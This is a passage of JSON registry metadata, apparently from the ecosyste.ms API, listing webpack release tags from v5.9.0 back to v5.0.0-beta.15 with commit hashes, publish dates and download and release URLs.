tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30a